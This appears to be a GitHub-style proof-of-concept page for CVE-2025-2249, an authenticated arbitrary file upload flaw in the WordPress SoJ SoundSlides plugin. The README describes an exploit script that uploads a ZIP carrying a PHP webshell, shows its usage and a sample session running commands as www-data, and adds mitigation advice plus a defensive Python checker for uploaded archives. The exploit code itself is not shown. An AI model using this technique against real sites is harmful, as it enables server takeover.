
CVE-2025-2249 PoC — WordPress plugin SoJ SoundSlides code issue vulnerability

Associated Vulnerability
Title: WordPress plugin SoJ SoundSlides code issue vulnerability (CVE-2025-2249)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL; a WordPress plugin is an application add-on for it. WordPress plugin SoJ SoundSlides versions 1.2.2 and earlier contain a code issue vulnerability: the soj_soundslides_options_subpanel function lacks file type validation, which may allow an authenticated attacker to upload arbitrary files and execute remote code.
Description
WordPress SoJ SoundSlides Plugin <= 1.2.2 is vulnerable to Arbitrary File Upload
Readme

# 🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authenticated Arbitrary File Upload

> ⚠️ **DISCLAIMER:** This exploit is for educational and authorized testing purposes only.

---

## 📌 Vulnerability Summary

- **Plugin:** SoJ SoundSlides  
- **Affected Versions:** <= 1.2.2  
- **Type:** Authenticated (Contributor+) Arbitrary File Upload  
- **Patch Status:** ❌ No official fix available

The SoJ SoundSlides plugin allows authenticated users with **Contributor or higher** roles to upload arbitrary ZIP files. Due to missing validation, attackers can upload PHP webshells that are extracted and executed from a web-accessible directory.

---

## 💥 Impact

An attacker with valid WordPress credentials can:

- 📦 Upload a ZIP archive containing a PHP shell
- 🖥️ Execute system commands remotely (`?cmd=`)
- 🔓 Gain unauthorized control of the site/server

---

## 🛠️ Usage

```bash
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

| Argument  | Description                    |
|-----------|--------------------------------|
| `-u`      | WordPress base URL             |
| `-un`     | WordPress username             |
| `-p`      | WordPress password             |

---

## ✨ Features

- 🔍 Version check from plugin `readme.txt`
- 🧰 Auto-generates ZIP with required structure and webshell
- 📤 Exploits vulnerable upload endpoint
- 💻 Interactive command execution via uploaded shell

---

## 📂 ZIP File Structure

```
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)
```

---

## 🧪 Example

```bash
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
```
---

## 🛡️ Mitigation

- ❌ Disable or remove the plugin
- 🧱 Apply upload restrictions
- 🔍 Monitor `wp-content/uploads/` for unexpected `.php` files
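
The two mitigation items above ("apply upload restrictions" and "monitor `wp-content/uploads/` for unexpected `.php` files") as an added Python example; this is not code from the PoC or from the plugin. `audit_zip` performs the file-type and path validation that the advisory says `soj_soundslides_options_subpanel` lacks, rejecting any archive entry a web server could execute or that would escape the extraction directory; `find_unexpected_php` walks an uploads tree and lists the files such a check would have kept out. The allowed-extension list is an assumption based on the slideshow layout shown in this README (HTML, XML, MP3), and every archive and file built in `build_samples` and `run_demo` is constructed sample data with inert placeholder contents.

```python
"""Defensive checks for a slideshow-archive upload path (added example, not the plugin's code)."""
import os
import posixpath
import tempfile
import zipfile
from typing import Dict, List, Tuple

# Extensions a typical PHP web server will execute; a slideshow archive never needs them.
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar", ".phps"}
# Content a SoundSlides-style package legitimately contains (assumption: based on the README's tree).
ALLOWED_EXTENSIONS = {".html", ".xml", ".mp3", ".jpg", ".jpeg", ".png", ".gif", ".css", ".js"}


def is_executable_name(name: str) -> bool:
    """True if any dotted suffix is executable, so 'shell.php.jpg' is caught as well as 'shell.php'."""
    parts = posixpath.basename(name).lower().split(".")
    return any("." + p in EXECUTABLE_EXTENSIONS for p in parts[1:])


def is_unsafe_path(name: str) -> bool:
    """True for absolute entries, '..' traversal, or backslash separators that bypass normalisation."""
    norm = posixpath.normpath(name)
    return name.startswith("/") or norm.startswith("..") or "\\" in name


def audit_zip(zip_path: str) -> List[str]:
    """Return the reasons an archive must be rejected; an empty list means it passed."""
    problems: List[str] = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_unsafe_path(name):
                problems.append(f"path traversal: {name}")
                continue
            if info.is_dir():
                continue
            base = posixpath.basename(name)
            if base.startswith("."):
                # Dotfiles such as .htaccess can re-enable PHP handling inside uploads.
                problems.append(f"hidden config file: {name}")
            elif is_executable_name(name):
                problems.append(f"executable content: {name}")
            elif posixpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
                problems.append(f"unexpected type: {name}")
    return problems


def find_unexpected_php(uploads_root: str) -> List[str]:
    """Walk an uploads tree and list files a web server could execute (relative POSIX paths)."""
    hits: List[str] = []
    for dirpath, _, filenames in os.walk(uploads_root):
        for fn in filenames:
            if is_executable_name(fn) or fn.startswith(".ht"):
                rel = os.path.relpath(os.path.join(dirpath, fn), uploads_root)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


def build_samples(tmpdir: str) -> Tuple[str, str]:
    """Construct a benign package and one carrying a PHP file plus a traversal entry (sample data)."""
    slides = [("show/index.html", "<html></html>"), ("show/data/data.xml", "<slides/>"),
              ("show/audio/audio.mp3", b"\x00" * 16)]
    benign = os.path.join(tmpdir, "benign.zip")
    with zipfile.ZipFile(benign, "w") as zf:
        for name, body in slides:
            zf.writestr(name, body)
    hostile = os.path.join(tmpdir, "hostile.zip")
    with zipfile.ZipFile(hostile, "w") as zf:
        for name, body in slides:
            zf.writestr(name, body)
        zf.writestr("show/shell.php", "placeholder")   # inert stand-in, not a real script
        zf.writestr("../escape.txt", "placeholder")    # would land outside the extraction dir
    return benign, hostile


def run_demo() -> Dict[str, List[str]]:
    """Run both checks against constructed samples in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        benign, hostile = build_samples(tmp)
        uploads = os.path.join(tmp, "uploads")
        show_dir = os.path.join(uploads, "SoundSlides", "show")
        os.makedirs(show_dir)
        for name, body in (("index.html", "<html></html>"), ("shell.php", "placeholder")):
            with open(os.path.join(show_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {
            "benign": audit_zip(benign),
            "hostile": audit_zip(hostile),
            "uploads_scan": find_unexpected_php(uploads),
        }


if __name__ == "__main__":
    for label, result in run_demo().items():
        print(f"{label}: {result}")
```

Running the file prints an empty list for the benign package, the two rejection reasons for the hostile one, and the single `.php` found under the constructed uploads tree. In a real deployment the scan would be pointed at the live `wp-content/uploads/` directory and run from cron or a file-integrity monitor; `audit_zip` shows the shape of the check an upload handler should apply before extracting anything.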
> Built with ❤️ by [Nxploited | Khaled ALenazi]  
> For education, awareness, and defense.

---

## 🧠 Final Note

Security is everyone's responsibility. Always test ethically, report responsibly, and protect the web.

File Snapshot

```
/data/pocs/a84dfc907ff73604f7d1efb2cb297654421d5101
├── [6.3K] CVE-2025-2249.py
├── [128K] exploit-demo.png
├── [1.1K] LICENSE
├── [2.6K] README.md
└── [   9] requirements.txt

0 directories, 5 files
```